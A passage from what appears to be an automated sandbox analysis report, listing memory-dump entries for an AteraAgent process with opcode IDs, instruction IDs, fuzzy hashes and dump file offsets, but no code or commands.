                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2d2dd0cc4efdf2ae7d9775690eaa2469621edaf43433679e21cb4850c4ca021
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2215531A1DF8B4FE7A9EB6884755A17BE0EF5520070901EFC089C7296EE29EC058702
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ad4312aa97e7a0cc2817ab1e7c339f67fe1c9be51491141ec626937f80ee6984
                                                                                                                                                                                                                                                                                                • Instruction ID: 0d975a1b6bcff615a23cb3937d664c4f60e79715fd6cdcd1679ffe49003a8dff
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad4312aa97e7a0cc2817ab1e7c339f67fe1c9be51491141ec626937f80ee6984
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A321B73071DE8D4FE7A9E7A88060A7577E1EF99200B0940FED09EC72A3CE28B945C741
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: a6fcd2e066e808ff90dbeedb07a904fe7c8d9a8414f15cc392682a90ba119122
                                                                                                                                                                                                                                                                                                • Instruction ID: e37eea4b9c9863d3803584bb16b2c3c2595dcb75f32690966906a6fcff6784e2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6fcd2e066e808ff90dbeedb07a904fe7c8d9a8414f15cc392682a90ba119122
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B213E31B1981D8FEFE5EB989464BEC73B1FF58315F45017AD00DE31A2CA29A9418780
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: dcd5bab19c81fa532f8e1e57364349e503546327053ca297c4dc5d630f9a2cf3
                                                                                                                                                                                                                                                                                                • Instruction ID: ecdc428da83dfcd8910e008ad00fe8db3cce77ee2acc59f2927604621d9e1299
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcd5bab19c81fa532f8e1e57364349e503546327053ca297c4dc5d630f9a2cf3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43112943B1F9990BF365F6AC6CB65F86780EF4572570942BFD08DC32A7EC482D564240
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: c5470195aa172e3ec50e0e969b879ae3d9ae6ddda53ead20b5341a36cbbd8e5f
                                                                                                                                                                                                                                                                                                • Instruction ID: fa4cbae59af9f9acc304abdc7d061b652ef65841e9eb1db9c13eb47f5209eb2f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5470195aa172e3ec50e0e969b879ae3d9ae6ddda53ead20b5341a36cbbd8e5f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3110832F0AE0E0FEBE8E15C64646B963C2EBD8265715053FD40DC32A4DD16DC838340
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 28cc9d254398940a593fdb29e878958227254ca50efc94689e2ad61a4663680f
                                                                                                                                                                                                                                                                                                • Instruction ID: 24b6f8a3bc5093250367ad0502f7d988d8064cf74d75e118c190b2a546b66a13
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28cc9d254398940a593fdb29e878958227254ca50efc94689e2ad61a4663680f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E911C232B0FD4D4BE7E5A49E3CA916536C1DB9969174641BFE40CC32B6DC169D418281
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 84db5037532f80c248a7a741f7d743eebd773ceed59e05fcf836880e59367d6a
                                                                                                                                                                                                                                                                                                • Instruction ID: 4f8220e232d46fa186fbb72bbfadc9848a41e58ccaceb1483c29e8c06368b03a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84db5037532f80c248a7a741f7d743eebd773ceed59e05fcf836880e59367d6a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3018131B19D0D0FE6E4EAECA85477673C5EB98360B41027AE50DC32A6ED69E8418382
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: fbf56beb754266e618ed4e85c56739ca7cc66a2dd60505bb64e87830294730a5
                                                                                                                                                                                                                                                                                                • Instruction ID: 141823631bd97e78a81fed4067f79602cd395501400c2a0bf6aacb33a3608342
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fbf56beb754266e618ed4e85c56739ca7cc66a2dd60505bb64e87830294730a5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9111061262EF8A4AD365E37854217E167D1EF90314F4505AEC0DEC72E3EEA875448342
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: eca3cda9cb9257e8262a50d98fad2c334fa44945de561b2a2c522371a68f988f
                                                                                                                                                                                                                                                                                                • Instruction ID: f78a88fecc6019c396d54f673bdf32d9149eda0d5ced7f727b522385b2eaed6b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eca3cda9cb9257e8262a50d98fad2c334fa44945de561b2a2c522371a68f988f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4201262284F6CA1FD366AAB058621E57FA0EF06710F0600AAE048874A3D9A9574AC392
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ef298519d4ad90d76d1862e0c64b66315deab8ad04b21a94a3bc0936ae62cf66
                                                                                                                                                                                                                                                                                                • Instruction ID: 46714ce1f214a30da56082d5106931b1564f3fe0d0b5f05d5f1e102ad31f98a2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef298519d4ad90d76d1862e0c64b66315deab8ad04b21a94a3bc0936ae62cf66
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B601A230A1DA484FE798EA6C94A97B5B7D1EF58301F5900FED418CB2E7DE296C408301
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 6f7fba5064761a4b74f1469f19487eb008ebee6b16c3d53ee74d56511e4741fc
                                                                                                                                                                                                                                                                                                • Instruction ID: 00d5fd50bcba5a9576a04ccb3b0f860d69873cbc1fefa1b51c083325b0f8f461
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f7fba5064761a4b74f1469f19487eb008ebee6b16c3d53ee74d56511e4741fc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22016221B29E4E4BEBA8EB5C80649A673D1FF98200785497AD049C3299ED69EC418781
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 0ee32748485edab3d0c966bc1c802751566252845a0b005223b4668f54342190
                                                                                                                                                                                                                                                                                                • Instruction ID: 702cc2fd6a5401901053701a55758c4fe50a84137c43d96b75de0d496d5c1079
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ee32748485edab3d0c966bc1c802751566252845a0b005223b4668f54342190
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B601D631B28D0F4FEBA8EB689060AB673E1FFA8300B4445BAD019C3299ED65EC418741
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: faeddf832a8984881fe1c3b0d0e9cb5e744386c7de1199f506912a9d17196760
                                                                                                                                                                                                                                                                                                • Instruction ID: 899f174c6021f8f9634c22ee16c03ab6a74a1162e53b2d26ea06abeb6ebd5be4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: faeddf832a8984881fe1c3b0d0e9cb5e744386c7de1199f506912a9d17196760
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97F0F035E4990C8BEB20EED0A4003F8FBB4EB42354F01203EC00CA7150D73ADA91CB49
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 35df57129e6a3999fc8e6e88f845d55189a17824480de6bff72ceb25170908b6
                                                                                                                                                                                                                                                                                                • Instruction ID: b06ed05826791a715c52aeb30db35bc9fd938700a0252a86c423e028c0f033d4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35df57129e6a3999fc8e6e88f845d55189a17824480de6bff72ceb25170908b6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3F06D35D49A5E8BD720EE94A4102F9F7B8EB42354F01223AD40CA7190D77EDA96CB49
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 15f1a3361c559bcc0bb6a99734121534d655f8a9963aec97b101df262ce9cccf
                                                                                                                                                                                                                                                                                                • Instruction ID: e15da0fe60ea552a2ca001eba45b68e5bce6b4ddecb2630f977cac1ce8cd58fa
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15f1a3361c559bcc0bb6a99734121534d655f8a9963aec97b101df262ce9cccf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8BF0243260AE0E0FDB90EAAC9494960F392FFA8310755076EC008CB220D921ED9A8742
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 1788a4ade38bb863666c048e0e3c84ca3a5adfc956c1f69ad87a255349a0baa8
                                                                                                                                                                                                                                                                                                • Instruction ID: 637913412ae4af1fe86e3ec228c31996ceb284b7592de81f993fb5d87ec731c1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1788a4ade38bb863666c048e0e3c84ca3a5adfc956c1f69ad87a255349a0baa8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87F0F662A0A6CD8FE7B2E66894757E13BA0EF51310F0501FBD04CD6193EE242A05C740
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 450115debacd82605fe422f778e04d081bdb804d10dc602f5e552051d3dba081
                                                                                                                                                                                                                                                                                                • Instruction ID: 8f6ffac09dd87d9c438f33220e875387a4fffaa9fbd6870d7f3d6085ae626ec8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 450115debacd82605fe422f778e04d081bdb804d10dc602f5e552051d3dba081
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79F0E202F0FE8E0FD262E2AC18781A81BD2DBA512034E12FBC548C72A3EC1D5D424382
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 7e290fa4ca8b2e65896046f8e80bb8b3cbb8af4d921e97d5f1dd0d7f52cea425
                                                                                                                                                                                                                                                                                                • Instruction ID: 80c0b750647f68419c2e40255cdbba0bbc50d4dbaaf481692fc13af64b9e06ca
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e290fa4ca8b2e65896046f8e80bb8b3cbb8af4d921e97d5f1dd0d7f52cea425
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7501D63090AA8D8FDB55EF64C8612E97BA1FF55300F0204BDE40CC76A2DA75E950C781
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: aa41d693d6f5eb628d5e26320e1f519c8d6719c094f661bdc0aa88e26767199c
                                                                                                                                                                                                                                                                                                • Instruction ID: 97ee5662ed1e9d5304d4f230b6e1084681c1ab8c09471096e11d52a5b1e94143
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa41d693d6f5eb628d5e26320e1f519c8d6719c094f661bdc0aa88e26767199c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D01D13092DBCD4FEB46EF6888280B97FF0FF5A200F0504EBD458C72A2DAB559148741
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 48facf7f1bc51c4de3772fbbe9ec747426d34f736bed72dca7d1f588d6664adb
                                                                                                                                                                                                                                                                                                • Instruction ID: 78a62807dd4e971f910eef5314d4465a362e5c78966f1ac46f3e4cd96b7a7deb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48facf7f1bc51c4de3772fbbe9ec747426d34f736bed72dca7d1f588d6664adb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89F0E93191EA4F4FD379F76C85556A077E0FF08350B5A06AED449CB2A2EF18ED918780
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ab8f8d497795efdda59d69bb2d9a8b76a995602398ffa7baa314556e84ef0ab7
                                                                                                                                                                                                                                                                                                • Instruction ID: 5be45466c244d8a10d4d557a374b74e6c72fd999721749f937092e4a7c9d10da
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab8f8d497795efdda59d69bb2d9a8b76a995602398ffa7baa314556e84ef0ab7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3F02D2150EACE1FD366E76894245A07BF0EF45300B0E01FAC488C71A3D918AA948351
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: eeb47370dcb61dce0683cbac4e2afc172b13791d14fdc21d59387b32a84381c2
                                                                                                                                                                                                                                                                                                • Instruction ID: 080661a2df744c4547748f34217ccdea0b4441dbe0b01daf7b2cd14e48d8f668
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eeb47370dcb61dce0683cbac4e2afc172b13791d14fdc21d59387b32a84381c2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3EF0A031D05A0C8BD720EEA9E0003FDF7B4EF4A305F41103DD00CA2290C37A9695CB55
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 875f15f6b2f07698da9e66227dff2fe5e9668132f8460bbbb62f8aba5d9624ec
                                                                                                                                                                                                                                                                                                • Instruction ID: 8766896ac54644e4b9d53f43e83155215dd8c72ea684c0b915331e0995db66ce
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 875f15f6b2f07698da9e66227dff2fe5e9668132f8460bbbb62f8aba5d9624ec
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5AF01D31F09A2D8FDBA4EE989860BE8B372FB55255F0041B5D01DE3195CE35A9418B41
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 75e191324d4aaea9975794b0f3cb10e2f049cd143d3aa1f67be70c2cdda150e3
                                                                                                                                                                                                                                                                                                • Instruction ID: 31a4bdc99857bb6df906f444d90a608a6d896e98d169cec060050eb6714956dc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75e191324d4aaea9975794b0f3cb10e2f049cd143d3aa1f67be70c2cdda150e3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4F0A930C4AA0E8FC724EEA4E4403FDB2B4FB0A205F41223DD00CA2190C7BA9A94CB85
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 7f18dce410e4c0a13c2eb425277f00e39bdfb5091f7e933644abc922069b969c
                                                                                                                                                                                                                                                                                                • Instruction ID: 8f110a267e25e35e6b47b475ea313d5aff2f80ab224cf8c210bcbb293d54126f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f18dce410e4c0a13c2eb425277f00e39bdfb5091f7e933644abc922069b969c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27F0A030C46A0D8FCB24EEA4A4003FCB2B4FB0A205F41223DD00CB2180C379AB98CB25
                                                                                                                                                                                                                                                                                                Memory Dump Source
